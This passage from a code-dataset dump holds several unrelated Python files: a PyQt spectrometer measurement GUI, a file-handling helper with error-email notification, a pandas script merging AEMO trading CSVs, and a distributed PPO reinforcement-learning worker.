self.ax.set_xlabel('Wavelength')\r\n self.ax.set_ylabel('Counts')\r\n self.ax.set_title('Spectrometer spectrum')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n @pyqtSlot(np.ndarray)\r\n def plot_pulse(self, pulse):\r\n self.ax.clear()\r\n self.ax.plot(pulse)\r\n self.ax.set_xlabel('Sample nr')\r\n self.ax.set_ylabel('Counts')\r\n self.ax.set_title('Digitizer readout')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n @pyqtSlot()\r\n def clearplot(self):\r\n self.ax.clear()\r\n self.ax.set_xlabel('Measurement number')\r\n self.ax.set_ylabel('Normalized ratio spectropower to laserpower')\r\n self.ax.set_title('Power in spectrum versus laser power by integrating pulses')\r\n self.figure.tight_layout()\r\n self.canvas.draw()\r\n\r\n\r\nclass SpectroPower(QtWidgets.QWidget):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.running = False\r\n self.number_of_pulses = 30\r\n self.measurement_spectrometer_last = np.empty(0)\r\n self.measurement_spectrometer_sum = np.empty(0)\r\n self.measurement_spectrometer_dark_last = np.empty(0)\r\n self.measurement_spectrometer_dark_sum = np.empty(0)\r\n self.measurement_digitizer_last = np.empty(0)\r\n self.measurement_digitizer_sum = np.empty(0)\r\n\r\n # create workers\r\n self.sp = Spectrometer()\r\n self.digitizer = Digitizer()\r\n self.shuttercontrol = QShutterControl()\r\n self.signalchecker = MultipleSignal()\r\n self.plotwindow = PlotWindow()\r\n\r\n # setup ui\r\n self.startbutton = QtWidgets.QPushButton('start/restart')\r\n self.stopbutton = QtWidgets.QPushButton('stop')\r\n self.clearbutton = QtWidgets.QPushButton('clear')\r\n self.horizontallayout_buttons = QtWidgets.QHBoxLayout()\r\n self.horizontallayout_buttons.addWidget(self.startbutton)\r\n self.horizontallayout_buttons.addWidget(self.stopbutton)\r\n self.horizontallayout_buttons.addWidget(self.clearbutton)\r\n\r\n self.ratiobutton = QtWidgets.QPushButton('ratio')\r\n self.pulsebutton = QtWidgets.QPushButton('pulse')\r\n self.spectrometerbutton = QtWidgets.QPushButton('spectrometer')\r\n self.horizontallayout_buttons_experiment = QtWidgets.QHBoxLayout()\r\n self.horizontallayout_buttons_experiment.addWidget(self.ratiobutton)\r\n self.horizontallayout_buttons_experiment.addWidget(self.pulsebutton)\r\n self.horizontallayout_buttons_experiment.addWidget(self.spectrometerbutton)\r\n\r\n self.pulses_label = QtWidgets.QLabel('number of pulses')\r\n self.pulses = QtWidgets.QSpinBox()\r\n self.pulses.setMinimum(3)\r\n self.pulses.setMaximum(1000)\r\n self.pulses.setValue(self.number_of_pulses)\r\n self.pulses_indicator = QtWidgets.QLabel('set pulses')\r\n self.horizontallayout_pulses = QtWidgets.QHBoxLayout()\r\n self.horizontallayout_pulses.addWidget(self.pulses_label)\r\n self.horizontallayout_pulses.addWidget(self.pulses)\r\n self.horizontallayout_pulses.addWidget(self.pulses_indicator)\r\n\r\n self.gridlayout = QtWidgets.QGridLayout()\r\n self.gridlayout.addLayout(self.plotwindow.layout, 0, 0)\r\n self.gridlayout.addLayout(self.horizontallayout_pulses, 1, 0)\r\n self.gridlayout.addLayout(self.horizontallayout_buttons_experiment, 2, 0)\r\n self.gridlayout.addLayout(self.horizontallayout_buttons, 3, 0)\r\n self.setLayout(self.gridlayout)\r\n\r\n # create threads for workers and move workers to threads, then start threads\r\n self.sp_thread = QThread()\r\n self.digitizer_thread = QThread()\r\n self.shuttercontrol_thread = QThread()\r\n self.signalchecker_thread = QThread()\r\n self.plot_thread = QThread()\r\n self.sp.moveToThread(self.sp_thread)\r\n 
self.digitizer.moveToThread(self.digitizer_thread)\r\n self.shuttercontrol.moveToThread(self.shuttercontrol_thread)\r\n self.signalchecker.moveToThread(self.signalchecker_thread)\r\n self.plotwindow.moveToThread(self.plot_thread)\r\n\r\n # create timers for periodic signals\r\n self.timer_measurement = QTimer()\r\n self.timer_plot = QTimer()\r\n\r\n # connect signals\r\n self.startbutton.clicked.connect(self.start)\r\n self.stopbutton.clicked.connect(self.stop)\r\n self.clearbutton.clicked.connect(self.clear)\r\n self.ratiobutton.clicked.connect(self.measure_ratio)\r\n self.pulsebutton.clicked.connect(self.measure_pulse)\r\n self.spectrometerbutton.clicked.connect(self.measure_spectrum)\r\n\r\n self.timer_plot.timeout.connect(self.plot_ratio)\r\n\r\n self.sp.measurement_complete_result.connect(self.process_spectrometer)\r\n self.sp.measurement_complete_signal.connect(self.signalchecker.set_sp_done)\r\n self.sp.measurement_complete_dark_result.connect(self.process_spectrometer_dark)\r\n self.digitizer.measurement_complete_multiple_result.connect(self.process_digitizer_multiple)\r\n self.digitizer.measurement_complete_multiple_signal.connect(self.signalchecker.set_digi_done)\r\n self.digitizer.measurement_complete_single_result.connect(self.process_digitizer_single)\r\n\r\n self.stopbutton.setEnabled(False)\r\n self.startbutton.setEnabled(False)\r\n self.clearbutton.setEnabled(False)\r\n\r\n # initialize instruments\r\n self.init_sp()\r\n self.init_shuttercontrol()\r\n self.init_digitizer()\r\n\r\n # start instrument threads\r\n self.sp_thread.start()\r\n self.digitizer_thread.start()\r\n self.shuttercontrol_thread.start()\r\n self.plot_thread.start()\r\n self.signalchecker_thread.start()\r\n\r\n def init_sp(self):\r\n self.sp.connect()\r\n pass\r\n\r\n def init_shuttercontrol(self):\r\n self.shuttercontrol.connect()\r\n\r\n def init_digitizer(self):\r\n powermeter_channel = 1\r\n powermeter_dc_offset = 10\r\n self.digitizer.set_channel_gain(channel=powermeter_channel, value=1)\r\n self.digitizer.record_length = 0\r\n self.digitizer.max_num_events = 1\r\n self.digitizer.post_trigger_size = 90\r\n self.digitizer.acquisition_mode = CAENlib.AcqMode.SW_CONTROLLED\r\n channels = {powermeter_channel: powermeter_dc_offset}\r\n # Program the Digitizer\r\n self.digitizer.active_channels = channels.keys()\r\n for channel, dc_offset in channels.items():\r\n self.digitizer.set_dc_offset(channel, dc_offset)\r\n\r\n self.digitizer.external_trigger_mode = CAENlib.TriggerMode.ACQ_ONLY\r\n self.digitizer.external_trigger_level = CAENlib.IOLevel.TTL\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_digitizer_multiple(self, result):\r\n pulse_sum = np.sum(result)\r\n self.measurement_digitizer_sum = np.append(self.measurement_digitizer_sum, pulse_sum)\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_digitizer_single(self, result):\r\n self.measurement_digitizer_last = result\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_spectrometer(self, result):\r\n self.measurement_spectrometer_last = result\r\n spectrometer_sum = np.sum(result)\r\n self.measurement_spectrometer_sum = np.append(self.measurement_spectrometer_sum, spectrometer_sum)\r\n\r\n @pyqtSlot(np.ndarray)\r\n def process_spectrometer_dark(self, result):\r\n self.measurement_spectrometer_dark_last = result\r\n self.measurement_spectrometer_dark_sum = np.sum(result)\r\n\r\n @pyqtSlot()\r\n def pulses_changed(self):\r\n # closes the shutter, disconnects from doing new measurements and connects to wait for last measurement\r\n\r\n QTimer.singleShot(0, 
self.shuttercontrol.disable)\r\n\r\n try:\r\n self.pulses.editingFinished.disconnect()\r\n logging.info(f'disconnected edit pulses')\r\n except TypeError as e:\r\n logging.info(f'pulses {e}')\r\n\r\n self.pulses_indicator.setText(f'taking darkspectrum')\r\n self.number_of_pulses = self.pulses.value()\r\n self.toggle_all_buttons(False)\r\n if self.running:\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n self.signalchecker.measurements_done.connect(self.wait_for_last_measurement)\r\n logging.info(f'disconnected measurements done from new measurement')\r\n except TypeError as e:\r\n logging.info(f'signal: measurements done {e}')\r\n else:\r\n self.wait_for_last_measurement()\r\n\r\n @pyqtSlot()\r\n def wait_for_last_measurement(self):\r\n # takes new dark spectrum after last measurement has come in\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info(f'disconnected measurement done from await signal')\r\n except TypeError as e:\r\n logging.info(f'measurements done wait for last measurement{e}')\r\n\r\n self.clear()\r\n self.digitizer.number_of_pulses = self.number_of_pulses\r\n self.sp.set_integration_time(self.number_of_pulses)\r\n QTimer.singleShot(0, self.sp.measure_dark_spectrum)\r\n\r\n\r\n @pyqtSlot()\r\n def toggle_all_buttons(self, toggle):\r\n self.startbutton.setEnabled(toggle)\r\n self.stopbutton.setEnabled(toggle)\r\n self.clearbutton.setEnabled(toggle)\r\n self.ratiobutton.setEnabled(toggle)\r\n self.pulsebutton.setEnabled(toggle)\r\n self.spectrometerbutton.setEnabled(toggle)\r\n self.pulses.setEnabled(toggle)\r\n\r\n @pyqtSlot()\r\n def start(self):\r\n self.running = True\r\n # redo measurement at every integration time. Add in little extra time to make sure measurement is complete\r\n self.startbutton.setEnabled(False)\r\n self.stopbutton.setEnabled(True)\r\n self.signalchecker.measurements_done.connect(self.sp.measure_spectrum)\r\n self.signalchecker.reset()\r\n QTimer.singleShot(0, self.sp.measure_spectrum)\r\n self.timer_plot.start(500)\r\n\r\n @pyqtSlot()\r\n def stop(self):\r\n try:\r\n self.pulses.editingFinished.disconnect()\r\n logging.info(f'disconnected edit pulses from stop function')\r\n except TypeError as e:\r\n logging.info(f'pulses {e}')\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info(f'stopping, disconnected measurements done from new measurement')\r\n except TypeError as e:\r\n logging.info(f'signal: global done {e}')\r\n self.toggle_all_buttons(False)\r\n self.signalchecker.measurements_done.connect(self.reset_buttons)\r\n logging.info(f'connected measurement done to reset')\r\n\r\n @pyqtSlot()\r\n def reset_buttons(self):\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info(f'disconnected measurements done from reset buttons')\r\n except TypeError as e:\r\n logging.info(f'measurements done : {e}')\r\n self.toggle_all_buttons(True)\r\n self.stopbutton.setEnabled(False)\r\n self.ratiobutton.setEnabled(False)\r\n self.running = False\r\n self.pulses.editingFinished.connect(self.pulses_changed)\r\n\r\n @pyqtSlot()\r\n def clear(self):\r\n self.measurement_digitizer_sum = np.empty(0)\r\n self.measurement_spectrometer_sum = np.empty(0)\r\n try:\r\n self.signalchecker.measurements_done.disconnect(self.clear)\r\n except TypeError as e:\r\n logging.info(e)\r\n\r\n @pyqtSlot()\r\n def plot_ratio(self):\r\n cleaned_spectrum = self.measurement_spectrometer_sum - self.measurement_spectrometer_dark_sum\r\n minlength = min(len(cleaned_spectrum), 
len(self.measurement_digitizer_sum))\r\n if minlength > 0:\r\n ratio = cleaned_spectrum[:minlength]/self.measurement_digitizer_sum[:minlength]\r\n ratio_normalized = ratio/ratio[-1]\r\n cleaned_spectrum_ratio = cleaned_spectrum/cleaned_spectrum[-1]\r\n QTimer.singleShot(0, lambda x=cleaned_spectrum_ratio: self.plotwindow.plot(x))\r\n\r\n @pyqtSlot()\r\n def disconnect_signals(self):\r\n try:\r\n self.signalchecker.measurements_done.disconnect()\r\n logging.info('succesfully disconnected measurements done')\r\n except TypeError as e:\r\n logging.info(f'signal : measurements done - {e}')\r\n try:\r\n self.pulses.editingFinished.disconnect()\r\n logging.info('succesfully disconnected editingFinished')\r\n except TypeError as e:\r\n logging.info(f'signal : pulses editingfinished - {e}')\r\n try:\r\n self.timer_plot.stop()\r\n self.timer_plot.disconnect()\r\n logging.info('succesfully disconnected timer plot')\r\n except TypeError as e:\r\n logging.info(f'signal : timer plot - {e}')\r\n try:\r\n self.timer_measurement.stop()\r\n self.timer_measurement.disconnect()\r\n logging.info('succesfully disconnected timer measurement')\r\n except TypeError as e:\r\n logging.info(f'signal : timer measurement - {e}')\r\n try:\r\n self.sp.cache_cleared.disconnect()\r\n logging.info('succesfully disconnected cache cleared')\r\n except TypeError as e:\r\n logging.info(f'signal : cache cleared - {e}')\r\n try:\r\n self.sp.measurement_complete_dark_signal.disconnect()\r\n logging.info('succesfully disconnected measurement_dark')\r\n except TypeError as e:\r\n logging.info(f'signal : cache cleared - {e}')\r\n\r\n @pyqtSlot()\r\n def measure_ratio(self):\r\n self.disconnect_signals()\r\n self.clear()\r\n self.pulses_changed()\r\n self.sp.cache_cleared.connect(self.digitizer.measure_multiple_digi)\r\n self.pulses.editingFinished.connect(self.pulses_changed)\r\n self.sp.measurement_complete_dark_signal.connect(self.darkspectrum_taken)\r\n self.toggle_all_buttons(True)\r\n self.stopbutton.setEnabled(False)\r\n self.ratiobutton.setEnabled(False)\r\n\r\n self.timer_plot.timeout.connect(self.plot_ratio)\r\n self.timer_plot.start(500)\r\n\r\n def darkspectrum_taken(self):\r\n # opens shutter, sets the pulse indicator to current number of pulses.\r\n # Reconnects edit finished to pulses changed\r\n\r\n QTimer.singleShot(0, self.shuttercontrol.enable)\r\n pulses = self.number_of_pulses\r\n QTimer.singleShot(0, lambda x=pulses: self.pulses_indicator.setText(f'{x} pulses'))\r\n self.toggle_all_buttons(True)\r\n self.ratiobutton.setEnabled(False)\r\n self.stopbutton.setEnabled(False)\r\n self.pulses.setEnabled(True)\r\n self.pulses.lineEdit()\r\n self.pulses.editingFinished.connect(self.pulses_changed)\r\n\r\n @pyqtSlot()\r\n def measure_pulse(self):\r\n # todo include shutter signal to be open\r\n self.disconnect_signals()\r\n self.toggle_all_buttons(False)\r\n self.spectrometerbutton.setEnabled(True)\r\n self.ratiobutton.setEnabled(True)\r\n\r\n self.timer_measurement.timeout.connect(self.digitizer.measure_digi_emit)\r\n self.timer_plot.timeout.connect(self.plot_pulse)\r\n self.timer_measurement.start(100)\r\n self.timer_plot.start(100)\r\n\r\n @pyqtSlot()\r\n def plot_pulse(self):\r\n if any(self.measurement_digitizer_last):\r\n QTimer.singleShot(0, lambda x=self.measurement_digitizer_last: self.plotwindow.plot_pulse(x))\r\n else:\r\n QTimer.singleShot(0, self.plotwindow.clearplot)\r\n\r\n @pyqtSlot()\r\n def measure_spectrum(self):\r\n self.disconnect_signals()\r\n self.toggle_all_buttons(False)\r\n 
self.ratiobutton.setEnabled(True)\r\n self.pulsebutton.setEnabled(True)\r\n self.pulses.setEnabled(True)\r\n\r\n self.pulses.editingFinished.connect(self.set_pulses_spectrum)\r\n self.timer_measurement.timeout.connect(self.measure_sp)\r\n self.timer_plot.timeout.connect(self.plot_spectrum)\r\n self.timer_measurement.start(200)\r\n self.timer_plot.start(200)\r\n\r\n @pyqtSlot()\r\n def measure_sp(self):\r\n if not self.sp.measuring:\r\n QTimer.singleShot(0, self.sp.measure_spectrum)\r\n\r\n @pyqtSlot()\r\n def set_pulses_spectrum(self): \r\n self.number_of_pulses = self.pulses.value()\r\n self.pulses_indicator.setText(f'{self.number_of_pulses} pulses')\r\n QTimer.singleShot(0, lambda x=self.number_of_pulses: self.sp.set_integration_time(x))\r\n\r\n @pyqtSlot()\r\n def plot_spectrum(self):\r\n if any(self.measurement_spectrometer_last):\r\n QTimer.singleShot(0, lambda x=self.measurement_spectrometer_last: self.plotwindow.plot_spectrum(x))\r\n else:\r\n QTimer.singleShot(0, self.plotwindow.clearplot)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n main = SpectroPower()\r\n main.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"baukekooger/XY_Measurement","sub_path":"tests/oldstuff/test_power_spectrometer_relation.py","file_name":"test_power_spectrometer_relation.py","file_ext":"py","file_size_in_byte":21613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7760505312","text":"import os\nimport time\nfrom datetime import datetime\nfrom shutil import copyfile\n\nfrom pathlib import Path\n\nfrom outmail import send_mail\n\n\ndef get_datetime(rev: bool = False):\n if rev:\n date_time = str(datetime.now().strftime(\"%Y.%m.%d_%H.%M\"))\n else:\n date_time = str(datetime.now().strftime(\"%d.%m.%Y_%H.%M\"))\n return date_time\n\n\nclass ListDir:\n def __init__(self, target_path):\n \"\"\"\n\n :param target_path: Path for detect difference\n \"\"\"\n self.target_path = Path(target_path)\n self.reference_filelist = self.get_listdir()\n\n def get_listdir(self):\n return set(os.listdir(self.target_path))\n\n def get_diff(self):\n return self.get_listdir() - self.reference_filelist\n\n\ndef clear_testpath(testpath):\n if 'test' in str(testpath):\n if len(os.listdir(testpath)) > 0:\n for file in os.listdir(testpath):\n os.remove(testpath / Path(file))\n os.rmdir(testpath)\n if not Path(testpath).is_dir():\n print(f'testdir {testpath} removed')\n\n\ndef wait_downloaded_file(driver, pathtosave):\n my_list = ListDir(pathtosave)\n downloaded_file_name = set()\n counter = 15\n downloaded_file_full_path = None\n while not downloaded_file_name and counter:\n time.sleep(1)\n downloaded_file_name = my_list.get_diff()\n if len(downloaded_file_name) == 1 \\\n and 'issues' in str(downloaded_file_name) \\\n and '.csv' in str(downloaded_file_name) \\\n and 'down' not in str(downloaded_file_name):\n driver.close()\n driver.quit()\n downloaded_file_full_path = Path(pathtosave) / Path(list(downloaded_file_name)[0])\n else:\n downloaded_file_name = set()\n counter -= 1\n print(f'осталось {counter} секунд')\n if downloaded_file_full_path \\\n and downloaded_file_full_path.exists():\n print(f'сохранен {downloaded_file_full_path}')\n clear_testpath(pathtosave)\n else:\n print('Downloaded file not exist. 
ERROR')\n return downloaded_file_full_path\n\n\ndef wait_new_file(func):\n def wrapper(pathtosave):\n my_list = ListDir(pathtosave)\n print('start')\n func(pathtosave)\n print('finish')\n return my_list.get_diff()\n\n return wrapper\n\n\ndef send_error_to_me(error_message):\n send_mail(e_addr='phaggi@gmail.com', subject='Problem!',\n body_text=error_message)\n\n\ndef mailme_error(error_message):\n send_error_to_me(error_message=error_message)\n raise Exception(error_message)\n\n\ndef find_file(filenames: set, pathtosave, word):\n for filename in filenames:\n if word in filename:\n return pathtosave / Path(filename)\n else:\n mailme_error(f'В папке {pathtosave} новых файлов не найдено. А должны быть!')\n\n\ndef prepare_vba_school_input_csv(downloaded_file_full_path, vba_input_file_name, vba_work_dir):\n src = downloaded_file_full_path\n dst = Path.cwd() / Path(vba_work_dir) / Path(vba_input_file_name)\n try:\n copyfile(src, dst)\n return dst\n except FileNotFoundError as e:\n mailme_error(f'Не удалось подготовить входной файл для VBA обработки.\\nОшибка {e}')\n\n\ndef prepare_filename(result_filename=None, ext=None):\n \"\"\"\n\n :param result_filename: str text for filename\n :param ext: str suffix '.xxx' or 'xxx'\n :return: (Path(filename.ext|, filename, ext)\n \"\"\"\n if not result_filename:\n result_filename = 'выгрузка'\n if not ext:\n ext = 'xlsx'\n elif ext.startswith('.'):\n ext = ext[1:]\n result_filename = '_'.join([result_filename, get_datetime()])\n return Path('.'.join([result_filename, ext])), result_filename, ext\n\n\ndef move_result(result_filename=None, ext=None, src=None, dst=None):\n \"\"\"\n\n :param result_filename: str text for filename\n :param ext: str suffix '.xxx' or 'xxx'\n :param src: maybe Path(/dir/file) or default vba/result.xlsx\n :param dst: maybe Path(/dir/file) or default ~/redmine/(result_filename)\n :return: (dst, result_filename)\n \"\"\"\n result_full_filename = prepare_filename(result_filename=result_filename, ext=ext)[0]\n if not src:\n src = Path.cwd() / Path('vba') / Path('result.xlsx')\n if not dst:\n dst = Path.home() / Path('redmine') / result_full_filename\n copyfile(src, dst)\n os.remove(src)\n return dst, result_full_filename\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"phaggi/outlook_mail_sender","sub_path":"fileman.py","file_name":"fileman.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18931265779","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[36]:\n\n\n# import necessary libraries - Monir\nimport pandas as pd\nimport os\nimport glob\nimport numpy as np\nfrom csv import reader\n\n\n# In[37]:\n\n\n# assign dataset names - Monir\nPUBLIC_TRADINGIS_list_of_files = []\n\n#read all dataset names with starting PUBLIC_DISPATCHSCADA - Monir\nPUBLIC_TRADINGIS_list_of_files = glob.glob('PUBLIC_TRADINGIS*.csv')\n\n\n# In[38]:\n\n\nlen(PUBLIC_TRADINGIS_list_of_files)\n\n\n# In[39]:\n\n\n# create empty list\ndataframes_list = []\n\nlist_of_names = PUBLIC_TRADINGIS_list_of_files\n\n\n# In[40]:\n\n\n# append datasets into teh list\nfor i in range(len(list_of_names)):\n # read csv file as a list of lists\n with open(list_of_names[i], 'r') as read_obj:\n # pass the file object to reader() to get the reader object\n csv_reader = reader(read_obj)\n # Pass reader object to list() to get a list of lists\n list_of_rows = list(csv_reader)\n #print(list_of_rows)\n #temp_df = pd.DataFrame(list_of_rows)\n temp_df = 
pd.DataFrame(list_of_rows[9:14])\n dataframes_list.append(temp_df)\n list_of_column = list_of_rows[8]\n \n \n #temp_df = pd.read_csv(list_of_names[i], skiprows = 1, skipfooter = 1)\n #dataframes_list[i]=temp_df\n #dataframes_list.append(temp_df)\n \n\n\n# In[42]:\n\n\nlen(dataframes_list)\n\n\n# In[41]:\n\n\nlist_of_column\n\n\n# In[43]:\n\n\ndataframes_list[0].shape\n\n\n# In[44]:\n\n\ndataframes_list[1673].tail()\n\n\n# In[45]:\n\n\n# multiple DataFrames are be merged (Concatenate pandas objects) - Monir\nPUBLIC_TRADINGIS_df = pd.concat(dataframes_list)\n\n\n# In[46]:\n\n\nPUBLIC_TRADINGIS_df.shape\n\n\n# In[47]:\n\n\nPUBLIC_TRADINGIS_df\n\n\n# In[48]:\n\n\nPUBLIC_TRADINGIS_df.columns = list_of_column\n\n\n# In[49]:\n\n\nPUBLIC_TRADINGIS_df.head()\n\n\n# In[21]:\n\n\nwith open('PUBLIC_TRADINGIS_202104180030_0000000340056853.csv', 'r') as read_obj:\n # pass the file object to reader() to get the reader object\n csv_reader = reader(read_obj)\n # Pass reader object to list() to get a list of lists\n list_of_rows = list(csv_reader)\n #print(list_of_rows)\n #temp_df = pd.DataFrame(list_of_rows)\n test_df = pd.DataFrame(list_of_rows[8:14])\n #temp_df = pd.DataFrame(list_of_rows[8:14])\n \n\n\n# In[22]:\n\n\ntest_df.head()\n\n\n# In[30]:\n\n\nPUBLIC_TRADINGIS_df.dtypes\n\n\n# In[31]:\n\n\nPUBLIC_TRADINGIS_df.info()\n\n\n# In[50]:\n\n\nPUBLIC_TRADINGIS_df\n\n\n# In[51]:\n\n\n# Export Pandas DataFrame to CSV - Monir\nPUBLIC_TRADINGIS_df.to_csv('PUBLIC_TRADINGIS_df.csv', index=False)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mzkhan2000/AEMO-data-Analytics","sub_path":"code-for-fetching-data/PUBLIC_TRADINGIS_DATA-monir.py","file_name":"PUBLIC_TRADINGIS_DATA-monir.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70352062803","text":"import numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport models\nimport pyro\nimport pyro.distributions as dist\nimport gym\nimport mujoco_py\n\n# start to define the workers...\nclass dppo_workers:\n def __init__(self, args):\n self.args = args \n self.env = gym.make(self.args.env_name)\n\n # get the numbers of observation and actions...\n num_inputs = self.env.observation_space.shape[0]\n num_actions = self.env.action_space.shape[0]\n # define the network...\n self.actor_net = models.Actor_Network(num_inputs, num_actions)\n self.critic_net = models.Critic_Network(num_inputs)\n \n # start to define the training function...\n def train_network(self, traffic_signal, critic_counter, actor_counter, shared_critic_model, shared_actor_model, \\\n shared_obs_state, critic_shared_grad_buffer, actor_shared_grad_buffer, reward_buffer):\n\n # update the parameters....\n self.actor_net.load_state_dict(shared_actor_model.state_dict())\n self.critic_net.load_state_dict(shared_critic_model.state_dict())\n while True:\n # update the parameters...\n # define the memory...\n brain_memory = []\n reward_sum = 0\n for _ in range(self.args.collection_length):\n state = self.env.reset()\n state = shared_obs_state.normalize(state)\n while True:\n # put the state into the Variables....\n state_tensor = Variable(torch.Tensor(state).unsqueeze(0))\n # input the state into the network to predict the actions...\n action_alpha, action_beta = self.actor_net(state_tensor)\n # sample actions from the beta distribution....\n actions_cpu, actions_real = self.select_actions(action_alpha, action_beta)\n # input actions into the environment...\n state_, reward, done, _ = 
self.env.step(actions_real)\n # accumulate the rewards...\n reward_sum += reward\n # start to store the trainsition...\n brain_memory.append((state, reward, done, actions_cpu))\n if done:\n break \n \n # normalize the state...\n state_ = shared_obs_state.normalize(state_)\n state = state_\n # start to calculate the gradients for this time sequence...\n reward_buffer.add(reward_sum / self.args.collection_length)\n critic_loss, actor_loss = self.update_network(brain_memory, critic_shared_grad_buffer, actor_shared_grad_buffer, \\\n shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal)\n\n\n # calculate the gradients based on the information be collected...\n def update_network(self, brain_memory, critic_shared_grad_buffer, actor_shared_grad_buffer, \\\n shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal):\n # process the stored information\n state_batch = torch.Tensor(np.array([element[0] for element in brain_memory]))\n reward_batch = torch.Tensor(np.array([element[1] for element in brain_memory]))\n done_batch = [element[2] for element in brain_memory]\n actions_batch = torch.Tensor(np.array([element[3] for element in brain_memory]))\n\n # put them into the Variables...\n state_batch_tensor = Variable(state_batch)\n actions_batch_tensor = Variable(actions_batch)\n # calculate the discounted reward...\n returns, advantages, old_action_prob = self.calculate_discounted_reward(state_batch_tensor, \\\n done_batch, reward_batch, actions_batch_tensor)\n\n # calculate the gradients...\n critic_loss, actor_loss = self.calculate_the_gradients(state_batch_tensor, actions_batch_tensor, \\\n returns, advantages, old_action_prob, critic_shared_grad_buffer, actor_shared_grad_buffer, \\\n shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal)\n \n return critic_loss.data.cpu().numpy()[0], actor_loss.data.cpu().numpy()[0]\n\n # calculate the gradients...\n def calculate_the_gradients(self, state_batch_tensor, actions_batch, returns, advantages, old_action_prob, critic_shared_grad_buffer, \\\n actor_shared_grad_buffer, shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal):\n\n # put the tensors into the Variable...\n returns = Variable(returns)\n advantages = Variable(advantages)\n # start to calculate the gradient of critic network firstly....\n for _ in range(self.args.value_update_step):\n self.critic_net.zero_grad()\n # get the init signal...\n signal_init = traffic_signal.get()\n # start to process...\n predicted_value = self.critic_net(state_batch_tensor)\n # calculate the critic loss firstly...\n critic_loss = (returns - predicted_value).pow(2).mean()\n # do the back-propagation...\n critic_loss.backward()\n # add the gradient to the shared_buffer...\n critic_shared_grad_buffer.add_gradient(self.critic_net)\n # after add the gradient, add the counter...\n critic_counter.increment()\n # wait for the cheif's signal...\n while signal_init == traffic_signal.get():\n pass\n self.critic_net.load_state_dict(shared_critic_model.state_dict())\n \n # start to update the critic_network....\n for _ in range(self.args.policy_update_step):\n # get the init signal....\n self.actor_net.zero_grad()\n signal_init = traffic_signal.get()\n # start to process...\n action_alpha, action_beta = self.actor_net(state_batch_tensor)\n new_beta_dist = dist.Beta(action_alpha, action_beta)\n new_action_prob = new_beta_dist.batch_log_pdf(actions_batch)\n ratio = torch.exp(new_action_prob - 
old_action_prob)\n surr1 = ratio * advantages\n surr2 = torch.clamp(ratio, 1 - self.args.epsilon, 1 + self.args.epsilon) * advantages\n actor_loss = -torch.min(surr1, surr2).mean()\n # do the back propogation\n actor_loss.backward()\n actor_shared_grad_buffer.add_gradient(self.actor_net)\n actor_counter.increment()\n while signal_init == traffic_signal.get():\n pass\n self.actor_net.load_state_dict(shared_actor_model.state_dict())\n \n return critic_loss, actor_loss\n\n # calculate the discounted reward\n def calculate_discounted_reward(self, state_batch_tensor, done_batch, reward_batch, actions_batch_tensor):\n # calculate the predicted value firstly...\n predicted_value = self.critic_net(state_batch_tensor)\n # calculate the returns and advantages firstly...\n predicted_value = predicted_value.detach()\n\n returns = torch.Tensor(len(done_batch), 1)\n advantages = torch.Tensor(len(done_batch), 1)\n deltas = torch.Tensor(len(done_batch), 1)\n\n previous_returns = 0\n previous_advantages = 0\n previous_value = 0\n # use gae here...\n for idx in reversed(range(len(done_batch))):\n if done_batch[idx]:\n returns[idx, 0] = reward_batch[idx]\n #deltas[idx, 0] = reward_batch[idx] - predicted_value.data[idx, 0]\n #advantages[idx, 0] = deltas[idx, 0]\n advantages[idx, 0] = returns[idx, 0] - predicted_value.data[idx, 0]\n else:\n returns[idx, 0] = reward_batch[idx] + self.args.gamma * previous_returns\n #deltas[idx, 0] = reward_batch[idx] + self.args.gamma * previous_value - predicted_value.data[idx, 0]\n #advantages[idx, 0] = deltas[idx, 0] + self.args.gamma * self.args.tau * previous_advantages\n advantages[idx, 0] = returns[idx, 0] - predicted_value.data[idx, 0]\n\n previous_returns = returns[idx, 0]\n previous_value = predicted_value.data[idx, 0]\n previous_advantages = advantages[idx, 0]\n\n # normalize the advantages...\n advantages = (advantages - advantages.mean()) / advantages.std()\n # calculate the old action probabilities...\n action_alpha, action_beta = self.actor_net(state_batch_tensor)\n old_beta_dist = dist.Beta(action_alpha, action_beta)\n old_action_prob = old_beta_dist.batch_log_pdf(actions_batch_tensor)\n old_action_prob = old_action_prob.detach()\n \n return returns, advantages, old_action_prob \n\n # sample actions from the beta distributions....\n def select_actions(self, alpha, beta):\n actions = dist.beta(alpha, beta)\n actions_cpu = actions.data.cpu().numpy()[0]\n # real action...\n actions_real = actions_cpu.copy()\n actions_real = -1 + actions_real * 2\n\n return actions_cpu, actions_real\n\n# ------------------------------------------------------------------------------------------#\n# HERE, WE STRAT TO TEST OUR ALGORITHMS...\n def test_network(self, model_path):\n # load the models and means and std...\n policy_model, running_mean_filter = torch.load(model_path, map_location=lambda storage, loc: storage)\n mean = running_mean_filter[0]\n std = running_mean_filter[1]\n\n self.actor_net.load_state_dict(policy_model)\n self.actor_net.eval()\n\n # start to test...\n while True:\n state = self.env.reset()\n state = self.normalize_filter(state, mean, std)\n reward_sum = 0\n while True:\n self.env.render()\n state_tensor = 